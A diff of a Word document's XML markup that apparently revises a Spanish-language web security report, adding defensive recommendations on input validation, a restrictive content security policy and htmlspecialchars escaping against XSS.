                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6780,7 +5749,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5728540" cy="2236354"/>
+                      <a:ext cx="4923154" cy="452408"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6796,6 +5765,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -6805,6 +5778,644 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Implementar mecanismo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alidación de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ntrada</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">iempre que sea posible, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">definiendo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>un conjunto de reglas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (tipos de datos que </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recibes y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>características</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de los mismos)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o patrones esperados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">uso de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">expresiones regulares </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[regex] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ajustando los datos </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>esperados con</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> las entradas, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>rechazando</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>cualquier entrada que no se ajuste al patrón</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ayuda</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ndo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>prevenir inyecciones maliciosas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2.3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.- Ejemplo de Mejora</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de código para el nivel medio</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC3272A" wp14:editId="08BAB159">
+            <wp:extent cx="5400040" cy="2319655"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="806194795" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="806194795" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2319655"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Este código mejorado implementa una política de seguridad de contenido restrictiva que solo permite ejecutar scripts del mismo origen y bloquea todos los demás, lo que reduce significativamente el riesgo de ataques XSS. Además, utiliza </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">la función </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>`htmlspecialchars`</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para escapar correctamente la entrada del usuario, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">junto con </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“ENT_QUOTES”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que los convierte en entidades HTML de texto plano, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>protegiendo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> la aplicación web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contra la inyección de HTML/JavaScript</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -6813,226 +6424,905 @@
         <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="31"/>
+          <w:numId w:val="38"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Validar y san</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ea</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>r todas las entradas del usuario</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, para que </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>solo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> se puedan incluir archivos permitidos.</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>RECOMENDACIONES MÁS IMPORTANTES</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
